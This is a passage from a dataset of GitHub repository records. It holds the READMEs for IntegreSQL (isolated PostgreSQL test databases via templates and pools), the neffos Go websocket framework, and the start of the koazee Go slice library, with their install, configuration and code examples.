pool](#approach-3c-isolation-by-cached-templates-and-pool)\r\n - [Approach 3c benchmark 1: Baseline](#approach-3c-benchmark-1-baseline)\r\n - [Approach 3c benchmark 2: Small project](#approach-3c-benchmark-2-small-project)\r\n - [Final approach: IntegreSQL](#final-approach-integresql)\r\n - [Integrate by client lib](#integrate-by-client-lib)\r\n - [Integrate by RESTful JSON calls](#integrate-by-restful-json-calls)\r\n - [Demo](#demo)\r\n - [Install](#install)\r\n - [Install using Docker (preferred)](#install-using-docker-preferred)\r\n - [Install locally](#install-locally)\r\n - [Configuration](#configuration)\r\n - [Usage](#usage)\r\n - [Run using Docker (preferred)](#run-using-docker-preferred)\r\n - [Run locally](#run-locally)\r\n - [Contributing](#contributing)\r\n - [Development setup](#development-setup)\r\n - [Development quickstart](#development-quickstart)\r\n - [Maintainers](#maintainers)\r\n - [License](#license)\r\n\r\n## Background\r\n\r\nWe came a long way to realize that something just did not feel right with our PostgreSQL integration testing strategies.\r\nThis is a loose summary of how this project came to life.\r\n\r\n### Approach 0: Leaking database mutations for subsequent tests\r\n\r\nTesting our customer backends actually started quite simple:\r\n\r\n* Test runner starts\r\n* Recreate a PostgreSQL test database\r\n* Apply all migrations\r\n* Seed all fixtures\r\n* Utilizing the same PostgreSQL test database for each test:\r\n * **Run your test code** \r\n* Test runner ends\r\n\r\nIt's quite easy to spot the problem with this approach. Data may be mutated by any single test and is visible from all subsequent tests. It becomes cumbersome to make changes in your test code if you can't rely on a clean state in each and every test.\r\n\r\n### Approach 1: Isolating by resetting\r\n\r\nLet's try to fix that like this:\r\n\r\n* Test runner starts\r\n* Recreate a PostgreSQL test database\r\n* **Before each** test: \r\n * Truncate\r\n * Apply all migrations\r\n * Seed all fixtures\r\n* Utilizing the same PostgreSQL test database for each test:\r\n * **Run your test code** \r\n* Test runner ends\r\n\r\nWell, it's now isolated - but testing time has increased by a rather high factor and is totally dependent on your truncate/migrate/seed operations.\r\n\r\n### Approach 2a: Isolation by transactions\r\n\r\nWhat about using database transactions?\r\n\r\n* Test runner starts\r\n* Recreate a PostgreSQL test database\r\n* Apply all migrations\r\n* Seed all fixtures\r\n* **Before each** test: \r\n * Start a new database transaction\r\n* Utilizing the same PostgreSQL test database for each test:\r\n * **Run your test code** \r\n* **After each** test:\r\n * Rollback the database transaction\r\n* Test runner ends\r\n\r\nAfter spending various time to rewrite all code to actually use the injected database transaction in each code, you realize that nested transactions are not supported and can only be poorly emulated using save points. All database transaction specific business code, especially their potential error state, is not properly testable this way. You therefore ditch this approach.\r\n\r\n### Approach 2b: Isolation by mocking\r\n\r\nWhat about using database mocks?\r\n\r\n* Test runner starts\r\n* Utilizing an in-memory mock database isolated for each test:\r\n * **Run your test code** \r\n* Test runner ends\r\n\r\nI'm generally not a fan of emulating database behavior through a mocking layer while testing/implementing. Even minor version changes of PostgreSQL plus it's extensions (e.g. PostGIS) may introduce slight differences, e.g. how indices are used, function deprecations, query planner, etc. . It might not even be an erroneous result, just performance regressions or slight sorting differences in the returned query result.\r\n\r\nWe try to approximate local/test and live as close as possible, therefore using the same database, with the same extensions in their exact same version is a hard requirement for us while implementing/testing locally.\r\n\r\n### Approach 3a: Isolation by templates\r\n\r\nWe discovered that using [PostgreSQL templates](https://supabase.com/blog/2020/07/09/postgresql-templates) and creating the actual new test database from them is quite fast, let's to this:\r\n\r\n* Test runner starts\r\n* Recreate a PostgreSQL template database\r\n* Apply all migrations\r\n* Seed all fixtures\r\n* **Before each** test: \r\n * Create a new PostgreSQL test database from our already migrated/seeded template database\r\n* Utilizing a new isolated PostgreSQL test database for each test:\r\n * **Run your test code** \r\n* Test runner ends\r\n\r\nWell, we are up in speed again, but we still can do better, how about...\r\n\r\n### Approach 3b: Isolation by cached templates\r\n\r\n* Test runner starts\r\n* Check migrations/fixtures have changed (hash over all related files)\r\n * Yes\r\n * Recreate a PostgreSQL template database\r\n * Apply all migrations\r\n * Seed all fixtures\r\n * No, nothing has changed\r\n * Simply reuse the previous PostgreSQL template database\r\n* **Before each** test: \r\n * Create a new PostgreSQL test database from our already migrated/seeded template database\r\n* Utilizing a new isolated PostgreSQL test database for each test:\r\n * **Run your test code** \r\n* Test runner ends\r\n\r\nThis gives a significant speed bump as we no longer need to recreate our template database if no files related to the database structure or fixtures have changed. However, we still need to create a new PostgreSQL test database from a template before running any test. Even though this is quite fast, could we do better?\r\n\r\n### Approach 3c: Isolation by cached templates and pool\r\n\r\n* Test runner starts\r\n* Check migrations/fixtures have changed (hash over all related files)\r\n * Yes\r\n * Recreate a PostgreSQL template database\r\n * Apply all migrations\r\n * Seed all fixtures\r\n * No, nothing has changed\r\n * Simply reuse the previous PostgreSQL template database\r\n* Create a pool of n PostgreSQL test databases from our already migrated/seeded template database\r\n* **Before each** test: \r\n * Select the first new PostgreSQL test database that is ready from the test pool\r\n* Utilizing your selected PostgreSQL test database from the test pool for each test:\r\n * **Run your test code** \r\n* **After each** test: \r\n * If there are still tests lefts to run add some additional PostgreSQL test databases from our already migrated/seeded template database\r\n* Test runner ends\r\n\r\nFinally, by keeping a warm pool of test database we arrive at the speed of Approach 0, while having the isolation gurantees of all subsequent approaches.\r\nThis is actually the (simplified) strategy, that we have used in [allaboutapps-backend-stack](https://github.com/allaboutapps/aaa-backend-stack) for many years.\r\n\r\n#### Approach 3c benchmark 1: Baseline\r\n\r\nHere's a quick benchmark of how this strategy typically performed back then:\r\n\r\n```\r\n--- -------------------------------- ---\r\n replicas switched: 50 avg=11ms min=1ms max=445ms\r\n replicas awaited: 1 prebuffer=8 avg=436ms max=436ms\r\n background replicas: 58 avg=272ms min=41ms max=474ms\r\n - warm up template (cold): 82% 2675ms\r\n * truncate: 62% 2032ms\r\n * migrate: 18% 594ms\r\n * seed: 1% 45ms\r\n - switching: 17% 571ms\r\n * disconnect: 1% 42ms\r\n * switch replica: 14% 470ms\r\n - resolve next: 1% 34ms\r\n - await next: 13% 436ms\r\n * reinitialize: 1% 57ms\r\n strategy related time: --- 3246ms\r\n vs total executed time: 20% 15538ms\r\n--- ------------------------------ ---\r\n```\r\n\r\nThis is a rather small testsuite with `50` tests and with a tiny database. Thus the whole test run was finished in `~15sec`. `~2.7sec` were spend setting up the template within the warm up (truncate + migrate + seed) and `~0.6sec` in total waiting for a new test/replica databases to become available for a test. We spend `~20%` of our total execution time running / waiting inside our test strategy approach. \r\n\r\nThis a cold start. You pay for this warm-up flow only if no template database was cached by a previous test run (if your migrations + fixtures files - the `hash` over these files - hasn't changed).\r\n\r\nA new test database (called a replica here) from this tiny template database took max. `~500ms` to create, on avg. this was ~halfed and most importantly can be done in the background (while some tests already execute).\r\n\r\nThe cool thing about having a warm pool of replicas setup in the background, is that selecting new replicas from the pool is blazingly fast, as typically they *will be already ready* when it's time to execute the next test. For instance, it took `~500ms` max. and **`11ms` on avg.** to select a new replica for all subsequent tests (we only had to wait once until a replica became available for usage within a test - typically it's the first test to be executed).\r\n\r\n#### Approach 3c benchmark 2: Small project\r\n\r\nLet's look at a sightly bigger testsuite and see how this approach may possibly scale:\r\n\r\n```\r\n--- ----------------------------------- ---\r\n replicas switched: 280 avg=26ms min=11ms max=447ms\r\n replicas awaited: 1 prebuffer=8 avg=417ms max=417ms\r\n background replicas: 288 avg=423ms min=105ms max=2574ms\r\n - warm up template (cold): 40% 5151ms\r\n * truncate: 8% 980ms\r\n * migrate: 26% 3360ms\r\n * seed: 4% 809ms\r\n - switching: 60% 7461ms\r\n * disconnect: 2% 322ms\r\n * switch replica: 6% 775ms\r\n - resolve next: 2% 358ms\r\n - await next: 3% 417ms\r\n * reinitialize: 50% 6364ms\r\n strategy related time: --- 12612ms\r\n vs total executed time: 11% 111094ms\r\n--- --------------------------------- ---\r\n```\r\n\r\nThis test suite is larger and comes with `280` tests, the whole test run finished in `~1m50s` (`~390ms` per test on avg.). `~5.2sec` were spend setting up the template and `~7.5sec` in total waiting for a new test / replica databases to become available for a test.\r\n\r\nThe rise in switching time is expected, as we need way more replicas / test databases this time, however we only spend `~11%` running / waiting inside our test strategy approach. To put that into perspective, each test only had to **wait `~26ms` on avg.** until it could finally execute (and typically, this is solely the time it needs to open up a new database connection).\r\n\r\nThis should hopefully give you some base understanding on why we consider this testing approach essential for our projects. It's the sweet combination of speed and isolation. \r\n\r\n### Final approach: IntegreSQL\r\n\r\nWe realized that having the above pool logic directly within the test runner is actually counterproductive and is further limiting usage from properly utilizing parallel testing (+performance).\r\n\r\nAs we switched to Go as our primary backend engineering language, we needed to rewrite the above logic anyways and decided to provide a safe and language agnostic way to utilize this testing strategy with PostgreSQL.\r\n\r\nIntegreSQL is a RESTful JSON API distributed as Docker image or go cli. It's language agnostic and manages multiple [PostgreSQL templates](https://supabase.io/blog/2020/07/09/postgresql-templates/) and their separate pool of test databases for your tests. It keeps the pool of test databases warm (as it's running in the background) and is fit for parallel test execution with multiple test runners / processes.\r\n\r\nOur flow now finally changed to this:\r\n\r\n* **Start IntegreSQL** and leave it running **in the background** (your PostgreSQL template and test database pool will always be warm)\r\n* ...\r\n* 1..n test runners start in parallel\r\n* Once per test runner process\r\n * Get migrations/fixtures files `hash` over all related database files\r\n * `InitializeTemplate: POST /templates`: attempt to create a new PostgreSQL template database identifying though the above hash `payload: {\"hash\": \"string\"}`\r\n * `StatusOK: 200` \r\n * Truncate\r\n * Apply all migrations\r\n * Seed all fixtures\r\n * `FinalizeTemplate: PUT /templates/{hash}` \r\n * If you encountered any template setup errors call `DiscardTemplate: DELETE /templates/{hash}`\r\n * `StatusLocked: 423`\r\n * Some other process has already recreated a PostgreSQL template database for this `hash` (or is currently doing it), you can just consider the template ready at this point.\r\n * `StatusServiceUnavailable: 503`\r\n * Typically happens if IntegreSQL cannot communicate with PostgreSQL, fail the test runner process\r\n* **Before each** test `GetTestDatabase: GET /templates/{hash}/tests`\r\n * Blocks until the template database is finalized (via `FinalizeTemplate`)\r\n * `StatusOK: 200`\r\n * You get a fully isolated PostgreSQL database from our already migrated/seeded template database to use within your test\r\n * `StatusNotFound: 404`\r\n * Well, seems like someone forgot to call `InitializeTemplate` or it errored out.\r\n * `StatusGone: 410`\r\n * There was an error during test setup with our fixtures, someone called `DiscardTemplate`, thus this template cannot be used.\r\n * `StatusServiceUnavailable: 503`\r\n * Well, typically a PostgreSQL connectivity problem\r\n* Utilizing the isolated PostgreSQL test database received from IntegreSQL for each (parallel) test:\r\n * **Run your test code**\r\n* **After each** test optional: `ReturnTestDatabase: DELETE /templates/{hash}/tests/{test-database-id}`\r\n * Marks the test database that it can be wiped early on pool limit overflow (or reused if `true` is submitted)\r\n* 1..n test runners end\r\n* ...\r\n* Subsequent 1..n test runners start/end in parallel and reuse the above logic\r\n\r\n#### Integrate by client lib\r\n\r\nThe flow above might look intimidating at first glance, but trust us, it's simple to integrate especially if there is already an client library available for your specific language. We currently have those:\r\n\r\n* Go: [integresql-client-go](https://github.com/allaboutapps/integresql-client-go) by [Nick M\u00fcller - @MorpheusXAUT](https://github.com/MorpheusXAUT)\r\n* Python: [integresql-client-python](https://github.com/msztolcman/integresql-client-python) by [Marcin Sztolcman - @msztolcman](https://github.com/msztolcman)\r\n* .NET: [IntegreSQL.EF](https://github.com/mcctomsk/IntegreSql.EF) by [Artur Drobinskiy - @Shaddix](https://github.com/Shaddix)\r\n* JavaScript/TypeScript: [@devoxa/integresql-client](https://github.com/devoxa/integresql-client) by [Devoxa - @devoxa](https://github.com/devoxa)\r\n* ... *Add your link here and make a PR*\r\n\r\n#### Integrate by RESTful JSON calls\r\n\r\nA really good starting point to write your own integresql-client for a specific language can be found [here (go code)](https://github.com/allaboutapps/integresql-client-go/blob/master/client.go) and [here (godoc)](https://pkg.go.dev/github.com/allaboutapps/integresql-client-go?tab=doc). It's just RESTful JSON after all.\r\n\r\n#### Demo\r\n\r\nIf you want to take a look on how we integrate IntegreSQL - \ud83e\udd2d - please just try our [go-starter](https://github.com/allaboutapps/go-starter) project or take a look at our [testing setup code](https://github.com/allaboutapps/go-starter/blob/master/internal/test/testing.go). \r\n\r\n## Install\r\n\r\n### Install using Docker (preferred)\r\n\r\nA minimal Docker image containing a pre-built `IntegreSQL` executable is available at [Docker Hub](https://hub.docker.com/r/allaboutapps/integresql).\r\n\r\n```bash\r\ndocker pull allaboutapps/integresql\r\n```\r\n\r\n### Install locally\r\n\r\nInstalling `IntegreSQL` locally requires a working [Go](https://golang.org/dl/) (1.14 or above) environment. Install the `IntegreSQL` executable to your Go bin folder:\r\n\r\n```bash\r\ngo get github.com/allaboutapps/integresql/cmd/server\r\n```\r\n\r\n## Configuration\r\n\r\n`IntegreSQL` requires little configuration, all of which has to be provided via environment variables (due to the intended usage in a Docker environment). The following settings are available:\r\n\r\n| Description | Environment variable | Default | Required |\r\n| ----------------------------------------------------------------- | ------------------------------------- | -------------------- | -------- |\r\n| IntegreSQL: listen address (defaults to all if empty) | `INTEGRESQL_ADDRESS` | `\"\"` | |\r\n| IntegreSQL: port | `INTEGRESQL_PORT` | `5000` | |\r\n| PostgreSQL: host | `INTEGRESQL_PGHOST`, `PGHOST` | `\"127.0.0.1\"` | Yes |\r\n| PostgreSQL: port | `INTEGRESQL_PGPORT`, `PGPORT` | `5432` | |\r\n| PostgreSQL: username | `INTEGRESQL_PGUSER`, `PGUSER`, `USER` | `\"postgres\"` | Yes |\r\n| PostgreSQL: password | `INTEGRESQL_PGPASSWORD`, `PGPASSWORD` | `\"\"` | Yes |\r\n| PostgreSQL: database for manager | `INTEGRESQL_PGDATABASE` | `\"postgres\"` | |\r\n| PostgreSQL: template database to use | `INTEGRESQL_ROOT_TEMPLATE` | `\"template0\"` | |\r\n| Managed databases: prefix | `INTEGRESQL_DB_PREFIX` | `\"integresql\"` | |\r\n| Managed *template* databases: prefix `integresql_template_` | `INTEGRESQL_TEMPLATE_DB_PREFIX` | `\"template\"` | |\r\n| Managed *test* databases: prefix `integresql_test__` | `INTEGRESQL_TEST_DB_PREFIX` | `\"test\"` | |\r\n| Managed *test* databases: username | `INTEGRESQL_TEST_PGUSER` | PostgreSQL: username | |\r\n| Managed *test* databases: password | `INTEGRESQL_TEST_PGPASSWORD` | PostgreSQL: password | |\r\n| Managed *test* databases: minimal test pool size | `INTEGRESQL_TEST_INITIAL_POOL_SIZE` | `10` | |\r\n| Managed *test* databases: maximal test pool size | `INTEGRESQL_TEST_MAX_POOL_SIZE` | `500` | |\r\n\r\n\r\n## Usage\r\n\r\n### Run using Docker (preferred)\r\n\r\nSimply start the `IntegreSQL` [Docker](https://docs.docker.com/install/) (19.03 or above) container, provide the required environment variables and expose the server port:\r\n\r\n```bash\r\ndocker run -d --name integresql -e INTEGRESQL_PORT=5000 -p 5000:5000 allaboutapps/integresql\r\n```\r\n\r\n`IntegreSQL` can also be included in your project via [Docker Compose](https://docs.docker.com/compose/install/) (1.25 or above):\r\n\r\n```yaml\r\nversion: \"3.4\"\r\nservices:\r\n\r\n # Your main service image\r\n service:\r\n depends_on:\r\n - postgres\r\n - integresql\r\n environment:\r\n PGDATABASE: &PGDATABASE \"development\"\r\n PGUSER: &PGUSER \"dbuser\"\r\n PGPASSWORD: &PGPASSWORD \"9bed16f749d74a3c8bfbced18a7647f5\"\r\n PGHOST: &PGHOST \"postgres\"\r\n PGPORT: &PGPORT \"5432\"\r\n PGSSLMODE: &PGSSLMODE \"disable\"\r\n\r\n # optional: env for integresql client testing\r\n # see https://github.com/allaboutapps/integresql-client-go\r\n # INTEGRESQL_CLIENT_BASE_URL: \"http://integresql:5000/api\"\r\n\r\n # [...] additional main service setup\r\n\r\n integresql:\r\n image: allaboutapps/integresql:1.0.0\r\n ports:\r\n - \"5000:5000\"\r\n depends_on:\r\n - postgres\r\n environment: \r\n PGHOST: *PGHOST\r\n PGUSER: *PGUSER\r\n PGPASSWORD: *PGPASSWORD\r\n\r\n postgres:\r\n image: postgres:12.2-alpine # should be the same version as used live\r\n # ATTENTION\r\n # fsync=off, synchronous_commit=off and full_page_writes=off\r\n # gives us a major speed up during local development and testing (~30%),\r\n # however you should NEVER use these settings in PRODUCTION unless\r\n # you want to have CORRUPTED data.\r\n # DO NOT COPY/PASTE THIS BLINDLY.\r\n # YOU HAVE BEEN WARNED.\r\n # Apply some performance improvements to pg as these guarantees are not needed while running locally\r\n command: \"postgres -c 'shared_buffers=128MB' -c 'fsync=off' -c 'synchronous_commit=off' -c 'full_page_writes=off' -c 'max_connections=100' -c 'client_min_messages=warning'\"\r\n expose:\r\n - \"5432\"\r\n ports:\r\n - \"5432:5432\"\r\n environment:\r\n POSTGRES_DB: *PGDATABASE\r\n POSTGRES_USER: *PGUSER\r\n POSTGRES_PASSWORD: *PGPASSWORD\r\n volumes:\r\n - pgvolume:/var/lib/postgresql/data\r\n\r\nvolumes:\r\n pgvolume: # declare a named volume to persist DB data\r\n```\r\n\r\nYou may also refer to our [go-starter `docker-compose.yml`](https://github.com/allaboutapps/go-starter/blob/master/docker-compose.yml).\r\n\r\n### Run locally\r\n\r\nRunning the `IntegreSQL` server locally requires configuration via exported environment variables (see below):\r\n\r\n```bash\r\nexport INTEGRESQL_PORT=5000\r\nexport PGHOST=127.0.0.1\r\nexport PGUSER=test\r\nexport PGPASSWORD=testpass\r\nintegresql\r\n```\r\n\r\n## Contributing\r\n\r\nPull requests are welcome. For major changes, please [open an issue](https://github.com/allaboutapps/integresql/issues/new) first to discuss what you would like to change.\r\n\r\nPlease make sure to update tests as appropriate.\r\n\r\n### Development setup\r\n\r\n`IntegreSQL` requires the following local setup for development:\r\n\r\n- [Docker CE](https://docs.docker.com/install/) (19.03 or above)\r\n- [Docker Compose](https://docs.docker.com/compose/install/) (1.25 or above)\r\n\r\nThe project makes use of the [devcontainer functionality](https://code.visualstudio.com/docs/remote/containers) provided by [Visual Studio Code](https://code.visualstudio.com/) so no local installation of a Go compiler is required when using VSCode as an IDE.\r\n\r\nShould you prefer to develop `IntegreSQL` without the Docker setup, please ensure a working [Go](https://golang.org/dl/) (1.14 or above) environment has been configured as well as a PostgreSQL instance is available (tested against version 12 or above, but *should* be compatible to lower versions) and the appropriate environment variables have been configured as described in the [Install](#install) section.\r\n\r\n### Development quickstart\r\n\r\n1. Start the local docker-compose setup and open an interactive shell in the development container:\r\n\r\n```bash\r\n# Build the development Docker container, start it and open a shell\r\n./docker-helper.sh --up\r\n```\r\n\r\n2. Initialize the project, downloading all dependencies and tools required (executed within the dev container):\r\n\r\n```bash\r\n# Init dependencies/tools\r\nmake init\r\n\r\n# Build executable (generate, format, build, vet)\r\nmake\r\n```\r\n\r\n3. Execute project tests and start server:\r\n\r\n```bash\r\n# Execute tests\r\nmake test\r\n\r\n# Run IntegreSQL server with config from environment\r\nintegresql\r\n```\r\n\r\n## Maintainers\r\n\r\n- [Nick M\u00fcller - @MorpheusXAUT](https://github.com/MorpheusXAUT)\r\n- [Mario Ranftl - @majodev](https://github.com/majodev)\r\n\r\n## License\r\n\r\n[MIT](LICENSE) \u00a9 2020 aaa \u2013 all about apps GmbH | Nick M\u00fcller | Mario Ranftl and the `IntegreSQL` project contributors\r\n", "readme_type": "markdown", "hn_comments": "The background section in the readme Is blank.. no real explanation of why someone might use this", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kataras/neffos", "link": "https://github.com/kataras/neffos", "tags": ["go", "websocket", "iris", "neffos", "golang"], "stars": 514, "description": "A modern, fast and scalable websocket framework with elegant API written in Go", "lang": "Go", "repo_lang": "", "readme": "\n\n[![neffos chat example](https://github.com/neffos-contrib/bootstrap-chat/raw/master/screenshot.png)](https://github.com/neffos-contrib/bootstrap-chat)\n\n[![build status](https://img.shields.io/github/actions/workflow/status/kataras/neffos/ci.yml?style=for-the-badge)](https://github.com/kataras/neffos/actions) [![report card](https://img.shields.io/badge/report%20card-a%2B-ff3333.svg?style=for-the-badge)](https://goreportcard.com/report/github.com/kataras/neffos) [![view examples](https://img.shields.io/badge/learn%20by-examples-0077b3.svg?style=for-the-badge)](https://github.com/kataras/neffos/tree/master/_examples) [![chat](https://img.shields.io/gitter/room/neffos-framework/community.svg?color=blue&logo=gitter&style=for-the-badge)](https://gitter.im/neffos-framework/community) [![frontend pkg](https://img.shields.io/badge/JS%20-client-BDB76B.svg?style=for-the-badge)](https://github.com/kataras/neffos.js)\n\n## About neffos\n\nNeffos is a cross-platform real-time framework with expressive, elegant API written in [Go](https://go.dev). Neffos takes the pain out of development by easing common tasks used in real-time backend and frontend applications such as:\n\n- Scale-out using redis or nats[*](_examples/scale-out)\n- Adaptive request upgradation and server dialing\n- Acknowledgements\n- Namespaces\n- Rooms\n- Broadcast\n- Event-Driven architecture\n- Request-Response architecture\n- Error Awareness\n- Asynchronous Broadcast\n- Timeouts\n- Encoding\n- Reconnection\n- Modern neffos API client for Browsers, Nodejs[*](https://github.com/kataras/neffos.js) and Go\n\n## Learning neffos\n\n
\nQick View\n\n## Server\n\n```go\nimport (\n // [...]\n \"github.com/kataras/neffos\"\n \"github.com/kataras/neffos/gorilla\"\n)\n\nfunc runServer() {\n events := make(neffos.Namespaces)\n events.On(\"/v1\", \"workday\", func(ns *neffos.NSConn, msg neffos.Message) error {\n date := string(msg.Body)\n\n t, err := time.Parse(\"01-02-2006\", date)\n if err != nil {\n if n := ns.Conn.Increment(\"tries\"); n >= 3 && n%3 == 0 {\n // Return custom error text to the client.\n return fmt.Errorf(\"Why not try this one? 06-24-2019\")\n } else if n >= 6 && n%2 == 0 {\n // Fire the \"notify\" client event.\n ns.Emit(\"notify\", []byte(\"What are you doing?\"))\n }\n // Return the parse error back to the client.\n return err\n }\n\n weekday := t.Weekday()\n\n if weekday == time.Saturday || weekday == time.Sunday {\n return neffos.Reply([]byte(\"day off\"))\n }\n\n // Reply back to the client.\n responseText := fmt.Sprintf(\"it's %s, do your job.\", weekday)\n return neffos.Reply([]byte(responseText))\n })\n\n websocketServer := neffos.New(gorilla.DefaultUpgrader, events)\n\n // Fire the \"/v1:notify\" event to all clients after server's 1 minute.\n time.AfterFunc(1*time.Minute, func() {\n websocketServer.Broadcast(nil, neffos.Message{\n Namespace: \"/v1\",\n Event: \"notify\",\n Body: []byte(\"server is up and running for 1 minute\"),\n })\n })\n\n router := http.NewServeMux()\n router.Handle(\"/\", websocketServer)\n\n log.Println(\"Serving websockets on localhost:8080\")\n log.Fatal(http.ListenAndServe(\":8080\", router))\n}\n```\n\n## Go Client\n\n```go\nfunc runClient() {\n ctx := context.TODO()\n events := make(neffos.Namespaces)\n events.On(\"/v1\", \"notify\", func(c *neffos.NSConn, msg neffos.Message) error {\n log.Printf(\"Server says: %s\\n\", string(msg.Body))\n return nil\n })\n\n // Connect to the server.\n client, err := neffos.Dial(ctx,\n gorilla.DefaultDialer,\n \"ws://localhost:8080\",\n events)\n if err != nil {\n panic(err)\n }\n\n // Connect to a namespace.\n c, err := client.Connect(ctx, \"/v1\")\n if err != nil {\n panic(err)\n }\n\n fmt.Println(\"Please specify a date of format: mm-dd-yyyy\")\n\n for {\n fmt.Print(\">> \")\n var date string\n fmt.Scanf(\"%s\", &date)\n\n // Send to the server and wait reply to this message.\n response, err := c.Ask(ctx, \"workday\", []byte(date))\n if err != nil {\n if neffos.IsCloseError(err) {\n // Check if the error is a close signal,\n // or make use of the `<- client.NotifyClose`\n // read-only channel instead.\n break\n }\n\n // >> 13-29-2019\n // error received: parsing time \"13-29-2019\": month out of range\n fmt.Printf(\"error received: %v\\n\", err)\n continue\n }\n\n // >> 06-29-2019\n // it's a day off!\n //\n // >> 06-24-2019\n // it's Monday, do your job.\n fmt.Println(string(response.Body))\n }\n}\n```\n\n## Javascript Client\n\nNavigate to: \n\n
\n\nNeffos contains extensive and thorough **[wiki](https://github.com/kataras/neffos/wiki)** making it easy to get started with the framework.\n\nFor a more detailed technical documentation you can head over to our [godocs](https://godoc.org/github.com/kataras/neffos). And for executable code you can always visit the [_examples](_examples/) repository's subdirectory.\n\n### Do you like to read while traveling?\n\nYou can [request](https://forms.gle/7jzLUEuSALc3b8u9A) a PDF version of the **E-Book** today and be participated in the development of neffos.\n\n[![https://iris-go.com/images/neffos-book-overview.png](https://iris-go.com/images/neffos-book-overview.png)](https://forms.gle/7jzLUEuSALc3b8u9A)\n\n## Contributing\n\nWe'd love to see your contribution to the neffos real-time framework! For more information about contributing to the neffos project please check the [CONTRIBUTING.md](CONTRIBUTING.md) file.\n\n- [neffos-contrib](https://github.com/neffos-contrib) github organisation for more programming languages support, please invite yourself.\n\n## Security Vulnerabilities\n\nIf you discover a security vulnerability within neffos, please send an e-mail to [neffos-go@outlook.com](mailto:neffos-go@outlook.com). All security vulnerabilities will be promptly addressed.\n\n## License\n\nThe word \"neffos\" has a greek origin and it is translated to \"cloud\" in English dictionary.\n\nThis project is licensed under the [MIT license](https://opensource.org/licenses/MIT).\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wesovilabs/koazee", "link": "https://github.com/wesovilabs/koazee", "tags": ["functional-programming", "lazy-evaluation", "golang-library", "golang", "immutable", "arrays", "slices"], "stars": 514, "description": "A StreamLike, Immutable, Lazy Loading and smart Golang Library to deal with slices.", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/wesovilabs/koazee.svg?branch=master)](https://travis-ci.org/wesovilabs/koazee)\n[![Go Report Card](https://goreportcard.com/badge/github.com/wesovilabs/koazee)](https://goreportcard.com/report/github.com/wesovilabs/koazee)\n[![godoc](https://godoc.org/github.com/wesovilabs/koazee?status.svg)](http://godoc.org/github.com/wesovilabs/koazee)\n[![codecov](https://codecov.io/gh/wesovilabs/koazee/branch/master/graph/badge.svg)](https://codecov.io/gh/wesovilabs/koazee)\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/avelino/awesome-go#Utilities)\n\n# Koazee\n\n> Lazy like a koala, smart like a chimpanzee\n\n\n## What is Koazee?\n\nKoazee is a StreamLike, Immutable, Lazy Loading and smart Golang Library to deal with\u00a0slices. \n\n\nVisit the [Koazee wiki](https://github.com/wesovilabs/koazee/wiki) to find out what Koazee can do.\n\n## Koazee Highlights\n\n- **Immutable**: Koazee won't modify your inputs.\u00a0\n- **StreamLike**: We can combine operations up our convenience.\u00a0\n- **Lazy loading**: Operations are not performed until they're required\n- **Generic**: Koazee provides a generic interface able to deal with slice of any type without creating custom functions.\n- **Focusing on performance**: First rule for implementing a new operation is providing the best possible performance.\n\n\n\n## Getting started\n\n### Installing\n> Add Koazee to your project\n\n**Go modules**\n\n```\nmodule github.com/me/project\nrequire ( \n github.com/wesovilabs/koazee vX.Y.Z\n)\n```\n\n**Glide**\n\n```\nglide get github.com/wesovilabs/koazee\n```\n\n**Go dep**\n\n```\ngo get github.com/wesovilabs/koazee\n```\n\n### Usage\n\n#### Stream creation\n\nLet's first obtain a stream from an existing array.\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tfmt.Printf(\"slice: %v\\n\", numbers)\n\tstream := koazee.StreamOf(numbers)\n\tfmt.Printf(\"stream: %v\\n\", stream.Out().Val())\n}\n\n/**\ngo run main.go\n\nslice: [1 5 4 3 2 7 1 8 2 3]\nstream: [1 5 4 3 2 7 1 8 2 3]\n*/\n```\n\n#### Stream operations\n\nCurrent release v0.0.3 (Gibbon) brings us 20 generic operations that are showed below\n\n##### stream.At / stream.First / stream.Last\nThese operations return an element from the stream\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tstream := koazee.StreamOf(numbers)\n\tfmt.Printf(\"stream.At(4): %d\\n\", stream.At(4).Int())\n\tfmt.Printf(\"stream.First: %d\\n\", stream.First().Int())\n\tfmt.Printf(\"stream.Last: %d\\n\", stream.Last().Int())\n}\n\n/**\ngo run main.go\n\nstream.At(4): 2\nstream.First: 1\nstream.Last: 3\n*/\n```\n\n##### stream.Add / stream.Drop / stream.DropWhile / stream.DeleteAt / stream.Pop / stream.Set\nThese operations add or delete elements from the stream.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", numbers)\n\n\tstream := koazee.StreamOf(numbers)\n\tfmt.Print(\"stream.Add(10): \")\n\tfmt.Println(stream.Add(10).Do().Out().Val())\n\n\tfmt.Print(\"stream.Drop(5): \")\n\tfmt.Println(stream.Drop(5).Do().Out().Val())\n\t\n\tfmt.Print(\"stream.DropWhile(val<=5): \")\n\tfmt.Println(stream.DropWhile(func(element int)bool{return element<=5}).Do().Out().Val())\n\n\tfmt.Print(\"stream.DeleteAt(4): \")\n\tfmt.Println(stream.DeleteAt(4).Do().Out().Val())\n\n\tfmt.Print(\"stream.Set(0,5): \")\n\tfmt.Println(stream.Set(0, 5).Do().Out().Val())\n\n\tfmt.Print(\"stream.Pop(): \")\n\tval, newStream := stream.Pop()\n\tfmt.Printf(\"%d ... \", val.Int())\n\tfmt.Println(newStream.Out().Val())\n\n}\n\n/**\ngo run main.go\n\ninput: [1 5 4 3 2 7 1 8 2 3]\nstream.Add(10): [1 5 4 3 2 7 1 8 2 3 10]\nstream.Drop(5): [1 4 3 2 7 1 8 2 3]\nstream.DropWhile(val<=5): [7 8]\nstream.DeleteAt(4): [1 5 4 3 7 1 8 2 